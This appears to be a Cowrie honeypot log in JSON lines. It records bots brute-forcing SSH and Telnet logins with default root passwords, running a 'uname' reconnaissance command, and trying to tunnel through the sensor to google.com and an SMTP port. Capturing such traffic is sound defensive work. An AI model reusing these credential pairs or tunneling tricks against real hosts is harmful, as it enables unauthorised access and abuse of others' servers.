{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:24:31.240524Z","src_ip":"212.227.235.229","session":"4b3253e34225"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:24:32.317318Z","src_ip":"212.227.235.229","session":"4b3253e34225"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:32.577521Z","src_ip":"212.227.235.229","session":"4b3253e34225"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:32.588620Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.session.connect","src_ip":"65.49.20.69","src_port":24168,"dst_ip":"1.2.3.4","dst_port":23,"session":"440e3d8c4565","protocol":"telnet","message":"New connection: 65.49.20.69:24168 (1.2.3.4:23) [session: 440e3d8c4565]","sensor":"my-vps","timestamp":"2025-08-28T18:24:38.552679Z"}
{"eventid":"cowrie.session.closed","duration":1.8571960926055908,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:40.409806Z","src_ip":"65.49.20.69","session":"440e3d8c4565"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":38789,"dst_ip":"1.2.3.4","dst_port":23,"session":"0280a38dfdfb","protocol":"telnet","message":"New connection: 123.31.39.100:38789 (1.2.3.4:23) [session: 0280a38dfdfb]","sensor":"my-vps","timestamp":"2025-08-28T18:24:48.070694Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48006,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c8750efe944","protocol":"telnet","message":"New connection: 212.227.235.229:48006 (1.2.3.4:23) [session: 7c8750efe944]","sensor":"my-vps","timestamp":"2025-08-28T18:24:51.250877Z"}
{"eventid":"cowrie.session.closed","duration":47.12411975860596,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:25:35.194718Z","src_ip":"123.31.39.100","session":"0280a38dfdfb"}
{"eventid":"cowrie.session.closed","duration":46.01809644699097,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:25:37.268905Z","src_ip":"212.227.235.229","session":"7c8750efe944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46760,"dst_ip":"1.2.3.4","dst_port":22,"session":"23f9cb2c6f17","protocol":"ssh","message":"New connection: 212.227.125.160:46760 (1.2.3.4:22) [session: 23f9cb2c6f17]","sensor":"my-vps","timestamp":"2025-08-28T18:25:46.859564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.9","message":"Remote SSH version: SSH-2.0-OpenSSH_9.9","sensor":"my-vps","timestamp":"2025-08-28T18:25:46.941889Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.client.kex","hassh":"1cc79c7da9b5d5eead2c60983332a556","hasshAlgorithms":"sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["sntrup761x25519-sha512","sntrup761x25519-sha512@openssh.com","mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1cc79c7da9b5d5eead2c60983332a556","sensor":"my-vps","timestamp":"2025-08-28T18:25:47.036783Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-28T18:25:47.683349Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:25:47.683995Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:25:47.868062Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":443,"src_ip":"212.227.125.160","src_port":54492,"message":"direct-tcp connection request to google.com:443 from 127.0.0.1:54492","sensor":"my-vps","timestamp":"2025-08-28T18:26:07.809614Z","session":"23f9cb2c6f17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe5I9\\xcf\\x88\\xeaZ\\xc5I\\x9cF|\\x10w=\\x1e\\xdb~$\\xd7l\\x07eG\\x1b\\x87F_\\xd4{\\xd2\\x10 >\\xb43o'n\\x85\\xd9\\xf3<B\\xe8^)\\x9cr\\xc5\\xc2{\\xd6\\xac9O2\\xaf\\x07\\x86C\\x19\\x1d~\\xb4\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 0\\x8eY\\x0c\\xe0qs\\xbf\\xec\\xd4m\\xb1?hx/\\xf5\\x18\\xcfl\\xbd\\x14L\\xaf\\xd5X\\xa0\\xee\\x1f\\xe8\\xa0o\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to google.com:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe5I9\\xcf\\x88\\xeaZ\\xc5I\\x9cF|\\x10w=\\x1e\\xdb~$\\xd7l\\x07eG\\x1b\\x87F_\\xd4{\\xd2\\x10 >\\xb43o'n\\x85\\xd9\\xf3<B\\xe8^)\\x9cr\\xc5\\xc2{\\xd6\\xac9O2\\xaf\\x07\\x86C\\x19\\x1d~\\xb4\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 0\\x8eY\\x0c\\xe0qs\\xbf\\xec\\xd4m\\xb1?hx/\\xf5\\x18\\xcfl\\xbd\\x14L\\xaf\\xd5X\\xa0\\xee\\x1f\\xe8\\xa0o\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T18:26:07.972100Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.session.closed","duration":"21.3","message":"Connection lost after 21.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:26:08.180167Z","src_ip":"212.227.125.160","session":"23f9cb2c6f17"}
{"eventid":"cowrie.session.connect","src_ip":"121.180.41.184","src_port":52984,"dst_ip":"1.2.3.4","dst_port":23,"session":"31a1c73d4a56","protocol":"telnet","message":"New connection: 121.180.41.184:52984 (1.2.3.4:23) [session: 31a1c73d4a56]","sensor":"my-vps","timestamp":"2025-08-28T18:26:32.122885Z"}
{"eventid":"cowrie.session.closed","duration":30.36448359489441,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:27:02.487208Z","src_ip":"121.180.41.184","session":"31a1c73d4a56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45086,"dst_ip":"1.2.3.4","dst_port":22,"session":"d621d73992c6","protocol":"ssh","message":"New connection: 212.227.235.229:45086 (1.2.3.4:22) [session: d621d73992c6]","sensor":"my-vps","timestamp":"2025-08-28T18:27:45.033224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:27:45.034192Z","src_ip":"212.227.235.229","session":"d621d73992c6"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:27:45.141915Z","src_ip":"212.227.235.229","session":"d621d73992c6"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234","message":"login attempt [sol/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:27:45.467242Z","src_ip":"212.227.235.229","session":"d621d73992c6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:27:46.577990Z","src_ip":"212.227.235.229","session":"d621d73992c6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":34214,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7e04bc4dfdd","protocol":"ssh","message":"New connection: 80.94.95.15:34214 (1.2.3.4:22) [session: e7e04bc4dfdd]","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.094959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.096091Z","src_ip":"80.94.95.15","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45476,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c7bb5c35bd6","protocol":"ssh","message":"New connection: 212.227.125.160:45476 (1.2.3.4:22) [session: 5c7bb5c35bd6]","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.139192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.140271Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.147213Z","src_ip":"80.94.95.15","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.189871Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX3edc","message":"login attempt [root/1qaz@WSX3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.342545Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.login.success","username":"root","password":"BHRT**56$wx*%*St","message":"login attempt [root/BHRT**56$wx*%*St] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.440433Z","src_ip":"80.94.95.15","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:28:04.886844Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.887749Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.890018Z","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.939582Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.940789Z","src_ip":"212.227.125.160","session":"5c7bb5c35bd6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.941328Z","src_ip":"80.94.95.15","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:28:04.993368Z","src_ip":"80.94.95.15","session":"e7e04bc4dfdd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53428,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c4257ddb08d","protocol":"ssh","message":"New connection: 217.72.205.35:53428 (1.2.3.4:22) [session: 6c4257ddb08d]","sensor":"my-vps","timestamp":"2025-08-28T18:28:06.265784Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:28:06.267516Z","src_ip":"217.72.205.35","session":"6c4257ddb08d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38962,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cec9a447cc9","protocol":"ssh","message":"New connection: 212.227.235.229:38962 (1.2.3.4:22) [session: 6cec9a447cc9]","sensor":"my-vps","timestamp":"2025-08-28T18:29:01.541039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:29:01.647492Z","src_ip":"212.227.235.229","session":"6cec9a447cc9"}
